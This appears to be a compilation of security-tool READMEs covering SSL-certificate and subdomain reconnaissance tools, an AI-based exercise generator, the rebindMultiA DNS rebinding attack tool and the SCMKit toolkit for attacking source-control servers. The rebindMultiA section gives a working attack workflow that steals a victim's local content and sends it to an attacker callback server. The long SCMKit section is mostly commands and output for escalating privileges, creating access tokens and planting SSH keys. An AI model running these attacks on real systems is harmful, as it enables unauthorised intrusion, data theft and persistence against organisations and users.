During the reconnaissance phase, an attacker searches for any information about his target to create a profile that will later help him to identify possible ways to get in an organization.
CloudPulse is a powerful tool that simplifies and enhances the analysis of SSL certificate data. It leverages the extensive repository of SSL certificates obtained from the AWS EC2 machines available at Trickest Cloud. With CloudPulse , security researchers can efficiently explore SSL certificate details, uncover potential vulnerabilities, and gather valuable insights for a variety of security-related tasks.
Simplifies security assessments with a user-friendly interface. It allows you to effortlessly find company's asset's on aws cloud:
1- Download CloudPulse :
git clone https://github.com/yousseflahouifi/CloudPulse
cd CloudPulse/
2- Run docker compose :
docker-compose up -d
3- Run script.py script
docker-compose exec web python script.py
4 - Now go to http://:8000/search and enjoy the search engine
1- download CloudPulse :
git clone https://github.com/yousseflahouifi/CloudPulse
cd CloudPulse/
2- Setup virtual environment :
python3 -m venv myenv
source myenv/bin/activate
3- Install requirements.txt file :
pip install -r requirements.txt
4- run an instance of elasticsearch using docker :
docker run -d --name elasticsearch -p 9200:9200 -e "discovery.type=single-node" elasticsearch:6.6.1
5- update script.py and settings file to the host 'localhost':
#script.py
es = Elasticsearch([{'host': 'localhost', 'port': 9200}])
#se/settings.py
ELASTICSEARCH_DSL = {
'default': {
'hosts': 'localhost:9200'
},
}
6- Run script.py to index data in elasticsearch:
python script.py
7- Run the app:
python manage.py runserver 0:8000
Included in the CloudPulse repository is a sample data.csv file containing close to 4,000 records, which provides a glimpse of the tool's capabilities. For the full dataset, visit the Trickest Cloud repository clone the data and update data.csv file (it contains close to 9 millions data)
as an example searching for .mil data gives:
searching for tesla as en example gives :
CloudPulse heavily depends on the data.csv file, which is a sample dataset extracted from the larger collection maintained by Trickest. While the sample dataset provides valuable insights, the tool's full potential is realized when used in conjunction with the complete dataset, which is accessible in the Trickest repository here.
Users are encouraged to refer to the Trickest dataset for a more comprehensive and up-to-date analysis.
Columbus Project is an API first subdomain discovery service, blazingly fast subdomain enumeration service with advanced features.
Columbus returned 638 subdomains of tesla.com in 0.231 sec.
By default Columbus returns only the subdomains in a JSON string array:
curl 'https://columbus.elmasy.com/lookup/github.com'
But we think of the bash lovers, so if you don't want to mess with JSON and a newline separated list is your wish, then include the Accept: text/plain
header.
DOMAIN="github.com"
curl -s -H "Accept: text/plain" "https://columbus.elmasy.com/lookup/$DOMAIN" | \
while read SUB
do
if [[ "$SUB" == "" ]]
then
HOST="$DOMAIN"
else
HOST="${SUB}.${DOMAIN}"
fi
echo "$HOST"
done
For more, check the features or the API documentation.
Currently, entries are got from Certificate Transparency.
Usage of columbus-server:
-check
Check for updates.
-config string
Path to the config file.
-version
Print version informations.
-check
: Check the lates version on GitHub. Prints up-to-date
and returns 0
if no update required. Prints the latest tag (eg.: v0.9.1
) and returns 1
if new release available. In case of error, prints the error message and returns 2
.
git clone https://github.com/elmasy-com/columbus-server
make build
Create a new user:
adduser --system --no-create-home --disabled-login columbus-server
Create a new group:
addgroup --system columbus
Add the new user to the new group:
usermod -aG columbus columbus-server
Copy the binary to /usr/bin/columbus-server
.
Make it executable:
chmod +x /usr/bin/columbus-server
Create a directory:
mkdir /etc/columbus
Copy the config file to /etc/columbus/server.conf
.
Set the permission to 0600.
chmod -R 0600 /etc/columbus
Set the owner of the config file:
chown -R columbus-server:columbus /etc/columbus
Install the service file (eg.: /etc/systemd/system/columbus-server.service
).
cp columbus-server.service /etc/systemd/system/
Reload systemd:
systemctl daemon-reload
Start columbus:
systemctl start columbus-server
If you want to columbus start automatically:
systemctl enable columbus-server
AiCEF is a tool implementing the accompanying framework [1] in order to harness the intelligence that is available from online resources, as well as threat groups' activities, arsenal (eg. MITRE), to create relevant and timely cybersecurity exercise content. This way, we abstract the events from the reports in a machine-readable form. The produced graphs can be infused with additional intelligence, e.g. the threat actor profile from MITRE, also mapped in our ontology. While this may fill gaps that would be missing from a report, one can also manipulate the graph to create custom and unique models. Finally, we exploit transformer-based language models like GPT to convert the graph into text that can serve as the scenario of a cybersecurity exercise. We have tested and validated AiCEF with a group of experts in cybersecurity exercises, and the results clearly show that AiCEF significantly augments the capabilities in creating timely and relevant cybersecurity exercises in terms of both quality and time.
We used Python to create a machine-learning-powered Exercise Generation Framework and developed a set of tools to perform a set of individual tasks which would help an exercise planner (EP) to create a timely and targeted Cybersecurity Exercise Scenario, regardless of her experience.
Problems an Exercise Planner faces:
Our Main Objective: Build an AI powered tool that can generate relevant and up-to-date Cyber Exercise Content in a few steps with little technical expertise from the user.
The updated project, AiCEF v.2.0 is planned to be publicly released by the end of 2023, pending heavy code review and functionality updates. Submodules with reduced functinality will start being release by early June 2023. Thank you for your patience.
The most convenient way to install AiCEF is by using the docker-compose command. For production deployment, we advise you deploy MySQL manually in a dedicated environment and then to start the other components using Docker.
First, make sure you have docker-compose installed in your environment:
$ sudo apt-get install docker-compose
Then, clone the repository:
$ git clone https://github.com/grazvan/AiCEF/docker.git /<choose-a-path>/AiCEF-docker
$ cd /<choose-a-path>/AiCEF-docker
Import the MySQL file in your
$ mysql -u <your_username> รขโฌโ-password=<your_password> AiCEF_db < AiCEF_db.sql
Before running the docker-compose
command, settings must be configured. Copy the sample settings file and change it accordingly to your needs.
$ cp .env.sample .env
Note: Make sure you have an OpenAI API key available. Load the environment setttings (including your MySQL connection details):
set -a ; source .env
Finally, run docker-compose
in detached (-d
) mode:
$ sudo docker-compose up -d
A common usage flow consists of generating a Trend Report to analyze patterns over time, parsing relevant articles and converting them into Incident Breadcrumbs using MLTP module and storing them in a knowledge database called KDb. Incidents are then generated using IncGen component and can be enhanced using the Graph Enhancer module to simulate known APT activity. The incidents come with injects that can be edited on the fly. The CSE scenario is then created using CEGen, which defines various attributes like CSE name, number of Events, and Incidents. MLCESO is a crucial step in the methodology where dedicated ML models are trained to extract information from the collected articles with over 80% accuracy. The Incident Generation & Enhancer (IncGen) workflow can be automated, generating a variety of incidents based on filtering parameters and the existing database. The knowledge database (KDB) consists of almost 3000 articles classified into six categories that can be augmented using APT Enhancer by using the activity of known APT groups from MITRE or manually.
Find below some sample usage screenshots:
AiCEF is a product designed and developed by Alex Zacharis, Razvan Gavrila and Constantinos Patsakis.
[1] https://link.springer.com/article/10.1007/s10207-023-00693-z
[2] https://oasis-open.github.io/cti-documentation/stix/intro.html
Contributions are welcome! If you'd like to contribute to AiCEF v2.0, please follow these steps:
git checkout -b feature/your-branch-name
)git commit -m 'Add some feature'
)git push origin feature/your-branch-name
)AiCEF is licensed under Attribution-NonCommercial 4.0 International (CC BY-NC 4.0) license. See for more information.
Under the following terms:
Attribution โ You must give appropriate credit, provide a link to the license, and indicate if changes were made. You may do so in any reasonable manner, but not in any way that suggests the licensor endorses you or your use. NonCommercial โ You may not use the material for commercial purposes. No additional restrictions โ You may not apply legal terms or technological measures that legally restrict others from doing anything the license permits.
rebindMultiA
is a tool to perform a Multiple A Record rebind attack.
rebindmultia.com
is a domain that I've set up to assist with these attacks. It makes every IP its own authoritative nameserver for the domain [IP].ns.rebindmultia.com
. For example, 13.33.33.37.ns.rebindmultia.com
's authoritative nameserver is 13.33.33.37.ip.rebindmultia.com
which resolves (as you might have guessed) to 13.33.33.37
.
The MultiA Record Rebind attack is a variant of DNS Rebinding that weaponizes an attacker's ability to respond with two IP address in response to a DNS request and the browser's tendency to fallback to the second IP in the DNS response when the first one doesn't respond. In this attack, the attacker will configure a malicious DNS server and two malicious HTTP servers. The DNS server will respond with two A records:
127.0.0.1.target.13.33.33.37.ns.rebindmultia.com. 0 IN A 13.33.33.37
127.0.0.1.target.13.33.33.37.ns.rebindmultia.com. 0 IN A 127.0.0.1
The victim browser will then connect to the first IP and begin interacting with the attacker's first malicious HTTP server. This server will respond with a page that contains two iframes, one to /steal
and one to /rebind
. The /steal
iframe will load up a malicious page to reach into the second iframe and grab the content. The /rebind
endpoint, when hit, will issue a 302 redirect to /
and kill the first malicious HTTP server. As a result, when the browser reaches back out to the attacker's HTTP server, it will be met with a closed port. As such, it will fallback to the second IP. Once the target content has been loaded in the second iframe, the first iframe can reach into it, steal the data, and exfiltrate it to the attacker's second malicious HTTP server - the callback server.
This attack only works in a Windows environment. Linux and Mac will default to the private IP first and the attacker's server will never be queried.
127.0.0.1.target.13.33.33.37.ns.rebindmultia.com
.server.py
) parses the requested dns name and returns two A records: 13.33.33.37
and 127.0.0.1
.server.py
) and loads the /parent
page which has two iframes./steal
from the attacker's malicious HTTP server./rebind
which results in a 302 redirect to /
(the HTTP server will exit after this request)./
per the 302
from the attacker's server./
from the attacker's (now dead) HTTP server, but fails to do so.127.0.0.1
. It then reaches out to that server and loads up the page in the iframe.steal
iframe reaches into the newly loaded second iframe and grabs the content.steal
iframe then sends the results back to the attacker's callback server.pip3 install -r requirements.txt
python3 server.py --help
usage: server.py [-h] [-p PORT] [-c CALLBACK_PORT] [-d DNS_PORT] [-f FILE] [-l LOCATION]
optional arguments:
-h, --help show this help message and exit
-p PORT, --port PORT Specify port to attack on targetIp. Default: 80
-c CALLBACK_PORT, --callback-port CALLBACK_PORT
Specify the callback HTTP server port. Default: 31337
-d DNS_PORT, --dns-port DNS_PORT
Specify the DNS server port. Default: 53
-f FILE, --file FILE Specify the HTML file to display in the first iframe.(The "steal" iframe). Default: steal.html
-l LOCATION, --location LOCATION
Specify the location of the data you'd like to steal on the target. Default: /
If you get this error:
โฌโ[justin@RhynoDroplet:~/p/rebindMultiA]โ[14:26:24]โ[G:master=]
โฐโ>$ python3 server.py
Traceback (most recent call last):
File "server.py", line 2, in <module>
from http.server import HTTPServer, BaseHTTPRequestHandler, ThreadingHTTPServer
ImportError: cannot import name 'ThreadingHTTPServer'
Then you need to use a more up-to-date version of Python. Python 3.7+.
This must be executed from publically accessible IP.
git clone https://github.com/Rhynorater/rebindMultiA
cd rebindMutliA
pip3 install -r requirements.txt
echo "Send your victim to http://127.0.0.1.target.`curl -s http://ipinfo.io/ip`.ns.rebindmultia.com/parent to exfil 127.0.0.1"
sudo python3 server.py
Source Code Management Attack Toolkit - SCMKit is a toolkit that can be used to attack SCM systems. SCMKit allows the user to specify the SCM system and attack module to use, along with specifying valid credentials (username/password or API key) to the respective SCM system. Currently, the SCM systems that SCMKit supports are GitHub Enterprise, GitLab Enterprise and Bitbucket Server. The attack modules supported include reconnaissance, privilege escalation and persistence. SCMKit was built in a modular approach, so that new modules and SCM systems can be added in the future by the information security community.
The below 3rd party libraries are used in this project.
Library | URL | License |
---|---|---|
Octokit | https://github.com/octokit/octokit.net | MIT License |
Fody | https://github.com/Fody/Fody | MIT License |
GitLabApiClient | https://github.com/nmklotas/GitLabApiClient | MIT License |
Newtonsoft.Json | https://github.com/JamesNK/Newtonsoft.Json | MIT License |
Take the below steps to setup Visual Studio in order to compile the project yourself. This requires a .NET library that can be installed from the NuGet package manager.
https://api.nuget.org/v3/index.json
Install-Package Costura.Fody -Version 3.3.3
Install-Package Octokit
Install-Package GitLabApiClient
Install-Package Newtonsoft.Json
The below table shows where each module is supported
Attack Scenario | Module | Requires Admin? | GitHub Enterprise | GitLab Enterprise | Bitbucket Server |
---|---|---|---|---|---|
Reconnaissance | listrepo | No | X | X | X |
Reconnaissance | searchrepo | No | X | X | X |
Reconnaissance | searchcode | No | X | X | X |
Reconnaissance | searchfile | No | X | X | X |
Reconnaissance | listsnippet | No | X | ||
Reconnaissance | listrunner | No | X | ||
Reconnaissance | listgist | No | X | ||
Reconnaissance | listorg | No | X | ||
Reconnaissance | privs | No | X | X | |
Reconnaissance | protection | No | X | ||
Persistence | listsshkey | No | X | X | X |
Persistence | removesshkey | No | X | X | X |
Persistence | createsshkey | No | X | X | X |
Persistence | listpat | No | X | X | |
Persistence | removepat | No | X | X | |
Persistence | createpat | Yes (GitLab Enterprise only) | X | X | |
Privilege Escalation | addadmin | Yes | X | X | X |
Privilege Escalation | removeadmin | Yes | X | X | X |
Reconnaissance | adminstats | Yes | X |
Discover repositories being used in a particular SCM system
Provide the listrepo
module, along with any relevant authentication information and URL. This will output the repository name and URL.
This will list all repositories that a user can see.
SCMKit.exe -s github -m listrepo -c userName:password -u https://github.something.local
SCMKit.exe -s github -m listrepo -c apiKey -u https://github.something.local
This will list all repositories that a user can see.
SCMKit.exe -s gitlab -m listrepo -c userName:password -u https://gitlab.something.local
SCMKit.exe -s gitlab -m listrepo -c apiKey -u https://gitlab.something.local
This will list all repositories that a user can see.
SCMKit.exe -s bitbucket -m listrepo -c userName:password -u https://bitbucket.something.local
SCMKit.exe -s bitbucket -m listrepo -c apiKey -u https://bitbucket.something.local
C:\>SCMKit.exe -s gitlab -m listrepo -c username:password -u https://gitlab.hogwarts.local
==================================================
Module: listrepo
System: gitlab
Auth Type: Username/Password
Options:
Target URL: https://gitlab.hogwarts.local
Timestamp: 1/14/2022 8:30:47 PM
==================================================
Name | Visibility | URL
----------------------------------------------------------------------------------------------------------
MaraudersMap | Private | https://gitlab.hogwarts.local/hpotter/maraudersmap
testingStuff | Internal | https://gitlab.hogwarts.local/adumbledore/testingstuff
Spellbook | Internal | https://gitlab.hogwarts.local/hpotter/spellbook findShortestPathToGryffindorSword | Internal | https://gitlab.hogwarts.local/hpotter/findShortestPathToGryffindorSword
charms | Public | https://gitlab.hogwarts.local/hgranger/charms
Secret-Spells | Internal | https://gitlab.hogwarts.local/adumbledore/secret-spells
Monitoring | Internal | https://gitlab.hogwarts.local/gitlab-instance-10590c85/Monitoring
Search for repositories by repository name in a particular SCM system
Provide the searchrepo
module and your search criteria in the -o
command-line switch, along with any relevant authentication information and URL. This will output the matching repository name and URL.
The GitHub repo search is a "contains" search where the string you enter it will search for repos with names that contain your search term.
SCMKit.exe -s github -m searchrepo -c userName:password -u https://github.something.local -o "some search term"
SCMKit.exe -s github -m searchrepo -c apikey -u https://github.something.local -o "some search term"
The GitLab repo search is a "contains" search where the string you enter it will search for repos with names that contain your search term.
SCMKit.exe -s gitlab -m searchrepo -c userName:password -u https://gitlab.something.local -o "some search term"
SCMKit.exe -s gitlab -m searchrepo -c apikey -u https://gitlab.something.local -o "some search term"
The Bitbucket repo search is a "starts with" search where the string you enter it will search for repos with names that start with your search term.
SCMKit.exe -s bitbucket -m searchrepo -c userName:password -u https://bitbucket.something.local -o "some search term"
SCMKit.exe -s bitbucket -m searchrepo -c apikey -u https://bitbucket.something.local -o "some search term"
Search for code containing a given keyword in a particular SCM system
Provide the searchcode
module and your search criteria in the -o
command-line switch, along with any relevant authentication information and URL. This will output the URL to the matching code file, along with the line in the code that matched.
The GitHub code search is a "contains" search where the string you enter it will search for code that contains your search term in any line.
SCMKit.exe -s github -m searchcode -c userName:password -u https://github.something.local -o "some search term"
SCMKit.exe -s github -m searchcode -c apikey -u https://github.something.local -o "some search term"
The GitLab code search is a "contains" search where the string you enter it will search for code that contains your search term in any line.
SCMKit.exe -s gitlab -m searchcode -c userName:password -u https://gitlab.something.local -o "some search term"
SCMKit.exe -s gitlab -m searchcode -c apikey -u https://gitlab.something.local -o "some search term"
The Bitbucket code search is a "contains" search where the string you enter it will search for code that contains your search term in any line.
SCMKit.exe -s bitbucket -m searchcode -c userName:password -u https://bitbucket.something.local -o "some search term"
SCMKit.exe -s bitbucket -m searchcode -c apikey -u https://bitbucket.something.local -o "some search term"
Search for files in repositories containing a given keyword in the file name in a particular SCM system
Provide the searchfile
module and your search criteria in the -o
command-line switch, along with any relevant authentication information and URL. This will output the URL to the matching file in its respective repository.
The GitLab file search is a "contains" search where the string you enter it will search for files that contains your search term in the file name.
SCMKit.exe -s github -m searchfile -c userName:password -u https://github.something.local -o "some search term"
SCMKit.exe -s github -m searchfile -c apikey -u https://github.something.local -o "some search term"
The GitLab file search is a "contains" search where the string you enter it will search for files that contains your search term in the file name.
SCMKit.exe -s gitlab -m searchfile -c userName:password -u https://gitlab.something.local -o "some search term"
SCMKit.exe -s gitlab -m searchfile -c apikey -u https://gitlab.something.local -o "some search term"
The Bitbucket file search is a "contains" search where the string you enter it will search for files that contains your search term in the file name.
SCMKit.exe -s bitbucket -m searchfile -c userName:password -u https://bitbucket.something.local -o "some search term"
SCMKit.exe -s bitbucket -m searchfile -c apikey -u https://bitbucket.something.local -o "some search term"
C:\source\SCMKit\SCMKit\bin\Release>SCMKit.exe -s bitbucket -m searchfile -c apikey -u http://bitbucket.hogwarts.local:7990 -o jenkinsfile
==================================================
Module: searchfile
System: bitbucket
Auth Type: API Key
Options: jenkinsfile
Target URL: http://bitbucket.hogwarts.local:7990
Timestamp: 1/14/2022 10:17:59 PM
==================================================
[>] REPO: http://bitbucket.hogwarts.local:7990/scm/~HPOTTER/hpotter
[>] FILE: Jenkinsfile
[>] REPO: http://bitbucket.hogwarts.local:7990/scm/STUD/cred-decryption
[>] FILE: subDir/Jenkinsfile
Total matching results: 2
List snippets owned by the current user in GitLab
Provide the listsnippet
module, along with any relevant authentication information and URL.
SCMKit.exe -s gitlab -m listsnippet -c userName:password -u https://gitlab.something.local
SCMKit.exe -s gitlab -m listsnippet -c apikey -u https://gitlab.something.local
C:\>SCMKit.exe -s gitlab -m listsnippet -c username:password -u https://gitlab.hogwarts.local
==================================================
Module: listsnippet
System: gitlab
Auth Type: Username/Password
Options:
Target URL: https://gitlab.hogwarts.local
Timestamp: 1/14/2022 9:17:36 PM
==================================================
Title | Raw URL
---------------------------------------------------------------------------------------------
spell-script | https://gitlab.hogwarts.local/-/snippets/2/raw
List all GitLab runners available to the current user in GitLab
Provide the listrunner
module, along with any relevant authentication information and URL. If the user is an administrator, you will be able to list all runners within the GitLab Enterprise instance, which includes shared and group runners.
SCMKit.exe -s gitlab -m listrunner -c userName:password -u https://gitlab.something.local
SCMKit.exe -s gitlab -m listrunner -c apikey -u https://gitlab.something.local
C:\>SCMKit.exe -s gitlab -m listrunner -c username:password -u https://gitlab.hogwarts.local
==================================================
Module: listrunner
System: gitlab
Auth Type: Username/Password
Options:
Target URL: https://gitlab.hogwarts.local
Timestamp: 1/25/2022 11:40:08 AM
==================================================
ID | Name | Repo Assigned
---------------------------------------------------------------------------------
2 | gitlab-runner | https://gitlab.hogwarts.local/hpotter/spellbook.git
3 | gitlab-runner | https://gitlab.hogwarts.local/hpotter/maraudersmap.git
List gists owned by the current user in GitHub
Provide the listgist
module, along with any relevant authentication information and URL.
SCMKit.exe -s github -m listgist -c userName:password -u https://github.something.local
SCMKit.exe -s github -m listgist -c apikey -u https://github.something.local
C:\>SCMKit.exe -s github -m listgist -c username:password -u https://github-enterprise.hogwarts.local
==================================================
Module: listgist
System: github
Auth Type: Username/Password
Options:
Target URL: https://github-enterprise.hogwarts.local
Timestamp: 1/14/2022 9:43:23 PM
==================================================
Description | Visibility | URL
----------------------------------------------------------------------------------------------------------
Shell Script to Decode Spell | public | https://github-enterprise.hogwarts.local/gist/c11c6bb3f47fe67183d5bc9f048412a1
List all organizations the current user belongs to in GitHub
Provide the listorg
module, along with any relevant authentication information and URL.
SCMKit.exe -s github -m listorg -c userName:password -u https://github.something.local
SCMKit.exe -s github -m listorg -c apiKey -u https://github.something.local
C:\>SCMKit.exe -s github -m listorg -c username:password -u https://github-enterprise.hogwarts.local
==================================================
Module: listorg
System: github
Auth Type: Username/Password
Options:
Target URL: https://github-enterprise.hogwarts.local
Timestamp: 1/14/2022 9:44:48 PM
==================================================
Name | URL
-----------------------------------------------------------------------------------
Hogwarts | https://github-enterprise.hogwarts.local/api/v3/orgs/Hogwarts/repos
Get the assigned privileges to an access token being used in a particular SCM system
Provide the privs
module, along with an API key and URL.
SCMKit.exe -s github -m privs -c apiKey -u https://github.something.local
SCMKit.exe -s gitlab -m privs -c apiKey -u https://gitlab.something.local
C:\>SCMKit.exe -s gitlab -m privs -c apikey -u https://gitlab.hogwarts.local
==================================================
Module: privs
System: gitlab
Auth Type: API Key
Options:
Target URL: https://gitlab.hogwarts.local
Timestamp: 1/14/2022 9:18:27 PM
==================================================
Token Name | Active? | Privilege | Description
---------------------------------------------------------------------------------------------------------------------------------
hgranger-api-token | True | api | Read-write for the complete API, including all groups and projects, the Container Registry, and the Package Registry.
hgranger-api-token | True | read_user | Read-only for endpoints under /users. Essentially, access to any of the GET requests in the Users API.
hgranger-api-token | True | read_api | Read-only for the complete API, including all groups and projects, the Container Registry, and the Package Registry.
hgranger-api-token | True | read_repository | Read-only (pull) for the repository through git clone.
hgranger-api-token | True | write_repository | Read-write (pull, push) for the repository through git clone. Required for accessing Git repositories over HTTP when 2FA is enabled.
Promote a normal user to an administrative role in a particular SCM system
Provide the addadmin
module, along with any relevant authentication information and URL. Additionally, provide the target user you would like to add an administrative role to.
SCMKit.exe -s github -m addadmin -c userName:password -u https://github.something.local -o targetUserName
SCMKit.exe -s github -m addadmin -c apikey -u https://github.something.local -o targetUserName
SCMKit.exe -s gitlab -m addadmin -c userName:password -u https://gitlab.something.local -o targetUserName
SCMKit.exe -s gitlab -m addadmin -c apikey -u https://gitlab.something.local -o targetUserName
Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket.
SCMKit.exe -s bitbucket -m addadmin -c userName:password -u https://bitbucket.something.local -o targetUserName
C:\>SCMKit.exe -s gitlab -m addadmin -c apikey -u https://gitlab.hogwarts.local -o hgranger
==================================================
Module: addadmin
System: gitlab
Auth Type: API Key
Options: hgranger
Target URL: https://gitlab.hogwarts.local
Timestamp: 1/14/2022 9:19:32 PM
==================================================
[+] SUCCESS: The hgranger user was successfully added to the admin role.
Demote an administrative user to a normal user role in a particular SCM system
Provide the removeadmin
module, along with any relevant authentication information and URL. Additionally, provide the target user you would like to remove an administrative role from.
SCMKit.exe -s github -m removeadmin -c userName:password -u https://github.something.local -o targetUserName
SCMKit.exe -s github -m removeadmin -c apikey -u https://github.something.local -o targetUserName
SCMKit.exe -s gitlab -m removeadmin -c userName:password -u https://gitlab.something.local -o targetUserName
SCMKit.exe -s gitlab -m removeadmin -c apikey -u https://gitlab.something.local -o targetUserName
Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket.
SCMKit.exe -s bitbucket -m removeadmin -c userName:password -u https://bitbucket.something.local -o targetUserName
C:\>SCMKit.exe -s gitlab -m removeadmin -c username:password -u https://gitlab.hogwarts.local -o hgranger
==================================================
Module: removeadmin
System: gitlab
Auth Type: Username/Password
Options: hgranger
Target URL: https://gitlab.hogwarts.local
Timestamp: 1/14/2022 9:20:12 PM
==================================================
[+] SUCCESS: The hgranger user was successfully removed from the admin role.
Create an access token to be used in a particular SCM system
Provide the createpat
module, along with any relevant authentication information and URL. Additionally, provide the target user you would like to create an access token for.
This can only be performed as an administrator. You will provide the username that you would like to create a PAT for.
SCMKit.exe -s gitlab -m createpat -c userName:password -u https://gitlab.something.local -o targetUserName
SCMKit.exe -s gitlab -m createpat -c apikey -u https://gitlab.something.local -o targetUserName
Creates PAT for the current user authenticating as. In Bitbucket you cannot create a PAT for another user, even as an admin. Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket. Take note of the PAT ID that is shown after being created. You will need this when you need to remove the PAT in the future.
SCMKit.exe -s bitbucket -m createpat -c userName:password -u https://bitbucket.something.local
C:\>SCMKit.exe -s gitlab -m createpat -c username:password -u https://gitlab.hogwarts.local -o hgranger
==================================================
Module: createpat
System: gitlab
Auth Type: Username/Password
Options: hgranger
Target URL: https://gitlab.hogwarts.local
Timestamp: 1/20/2022 1:51:23 PM
==================================================
ID | Name | Token
-----------------------------------------------------
59 | SCMKIT-AaCND | R3ySx_8HUn6UQ_6onETx
[+] SUCCESS: The hgranger user personal access token was successfully added.
List access tokens for a user on a particular SCM system
Provide the listpat
module, along with any relevant authentication information and URL.
Only requires admin if you want to list another user's PAT's. A regular user can list their own PAT's.
SCMKit.exe -s gitlab -m listpat -c userName:password -u https://gitlab.something.local -o targetUser
SCMKit.exe -s gitlab -m listpat -c apikey -u https://gitlab.something.local -o targetUser
List access tokens for current user. Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket.
SCMKit.exe -s bitbucket -m listpat -c userName:password -u https://bitbucket.something.local
List access tokens for another user (requires admin). Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket.
SCMKit.exe -s bitbucket -m listpat -c userName:password -u https://bitbucket.something.local -o targetUser
C:\>SCMKit.exe -s gitlab -m listpat -c username:password -u https://gitlab.hogwarts.local -o hgranger
==================================================
Module: listpat
System: gitlab
Auth Type: Username/Password
Options: hgranger
Target URL: https://gitlab.hogwarts.local
Timestamp: 1/20/2022 1:54:41 PM
==================================================
ID | Name | Active? | Scopes
----------------------------------------------------------------------------------------------
59 | SCMKIT-AaCND | True | api, read_repository, write_repository
Remove an access token for a user in a particular SCM system
Provide the removepat
module, along with any relevant authentication information and URL. Additionally, provide the target user PAT ID you would like to remove an access token for.
Only requires admin if you want to remove another user's PAT. A regular user can remove their own PAT. You have to provide the PAT ID to remove. This ID was shown whenever you created the PAT and also when you listed the PAT.
SCMKit.exe -s gitlab -m removepat -c userName:password -u https://gitlab.something.local -o patID
SCMKit.exe -s gitlab -m removepat -c apikey -u https://gitlab.something.local -o patID
Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket. You have to provide the PAT ID to remove. This ID was shown whenever you created the PAT.
SCMKit.exe -s bitbucket -m removepat -c userName:password -u https://bitbucket.something.local -o patID
C:\>SCMKit.exe -s gitlab -m removepat -c apikey -u https://gitlab.hogwarts.local -o 58
==================================================
Module: removepat
System: gitlab
Auth Type: API Key
Options: 59
Target URL: https://gitlab.hogwarts.local
Timestamp: 1/20/2022 1:56:47 PM
==================================================
[*] INFO: Revoking personal access token of ID: 59
[+] SUCCESS: The personal access token of ID 59 was successfully revoked.
Create an SSH key to be used in a particular SCM system
Provide the createsshkey
module, along with any relevant authentication information and URL.
Creates SSH key for the current user authenticating as.
SCMKit.exe -s github -m createsshkey -c userName:password -u https://github.something.local -o "ssh public key"
SCMKit.exe -s github -m createsshkey -c apiToken -u https://github.something.local -o "ssh public key"
Creates SSH key for the current user authenticating as. Take note of the SSH key ID that is shown after being created. You will need this when you need to remove the SSH key in the future.
SCMKit.exe -s gitlab -m createsshkey -c userName:password -u https://gitlab.something.local -o "ssh public key"
SCMKit.exe -s gitlab -m createsshkey -c apiToken -u https://gitlab.something.local -o "ssh public key"
Creates SSH key for the current user authenticating as. Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket. Take note of the SSH key ID that is shown after being created. You will need this when you need to remove the SSH key in the future.
SCMKit.exe -s bitbucket -m createsshkey -c userName:password -u https://bitbucket.something.local -o "ssh public key"
List SSH keys for a user on a particular SCM system
Provide the listsshkey
module, along with any relevant authentication information and URL.
List SSH keys for current user. This will include SSH key ID's, which is needed when you would want to remove an SSH key.
SCMKit.exe -s github -m listsshkey -c userName:password -u https://github.something.local
SCMKit.exe -s github -m listsshkey -c apiToken -u https://github.something.local
List SSH keys for current user.
SCMKit.exe -s gitlab -m listsshkey -c userName:password -u https://gitlab.something.local
SCMKit.exe -s gitlab -m listsshkey -c apiToken -u https://gitlab.something.local
List SSH keys for current user. Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket.
SCMKit.exe -s bitbucket -m listsshkey -c userName:password -u https://bitbucket.something.local
C:\>SCMKit.exe -s gitlab -m listsshkey -u http://gitlab.hogwarts.local -c apiToken
==================================================
Module: listsshkey
System: gitlab
Auth Type: API Key
Options:
Target URL: https://gitlab.hogwarts.local
Timestamp: 2/7/2022 4:09:40 PM
==================================================
SSH Key ID | SSH Key Value | Title
---------------------------------------------------------------
9 | .....p50edigBAF4lipVZkAM= | SCMKIT-RLzie
10 | .....vGJLPGHiTwIxW9i+xAs= | SCMKIT-muFGU
Remove an SSH key for a user in a particular SCM system
Provide the removesshkey
module, along with any relevant authentication information and URL. Additionally, provide the target user SSH key ID to remove.
You have to provide the SSH key ID to remove. This ID was shown whenever you list SSH keys.
SCMKit.exe -s github -m removesshkey -c userName:password -u https://github.something.local -o sshKeyID
SCMKit.exe -s github -m removesshkey -c apiToken -u https://github.something.local -o sshKeyID
You have to provide the SSH key ID to remove. This ID was shown whenever you created the SSH key and is also shown when listing SSH keys.
SCMKit.exe -s gitlab -m removesshkey -c userName:password -u https://gitlab.something.local -o sshKeyID
SCMKit.exe -s gitlab -m removesshkey -c apiToken -u https://gitlab.something.local -o sshKeyID
Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket. You have to provide the SSH key ID to remove. This ID was shown whenever you created the SSH key and is also shown when listing SSH keys.
SCMKit.exe -s bitbucket -m removesshkey -c userName:password -u https://bitbucket.something.local -o sshKeyID
C:\>SCMKit.exe -s bitbucket -m removesshkey -u http://bitbucket.hogwarts.local:7990 -c username:password -o 16
==================================================
Module: removesshkey
System: bitbucket
Auth Type: Username/Password
Options: 16
Target URL: http://bitbucket.hogwarts.local:7990
Timestamp: 2/7/2022 1:48:03 PM
==================================================
[+] SUCCESS: The SSH key of ID 16 was successfully revoked.
List admin stats in GitHub Enterprise
Provide the adminstats
module, along with any relevant authentication information and URL. Site admin access in GitHub Enterprise is required to use this module
SCMKit.exe -s github -m adminstats -c userName:password -u https://github.something.local
SCMKit.exe -s github -m adminstats -c apikey -u https://github.something.local
C:\>SCMKit.exe -s github -m adminstats -c username:password -u https://github-enterprise.hogwarts.local
==================================================
Module: adminstats
System: github
Auth Type: Username/Password
Options:
Target URL: https://github-enterprise.hogwarts.local
Timestamp: 1/14/2022 9:45:50 PM
==================================================
Admin Users | Suspended Users | Total Users
------------------------------------------------------
1 | 0 | 5
Total Repos | Total Wikis
-----------------------------------
4 | 0
Total Orgs | Total Team Members | Total Teams
----------------------------------------------------------
1 | 0 | 0
Private Gis ts | Public Gists
-----------------------------------
0 | 1
List branch protections in GitHub Enterprise
Provide the protection
module, along with any relevant authentication information and URL. Optionally, supply a string in the options parameter to return matching results contained in repo names
SCMKit.exe -s github -m protection -c userName:password -u https://github.something.local
SCMKit.exe -s github -m protection -c apikey -u https://github.something.local
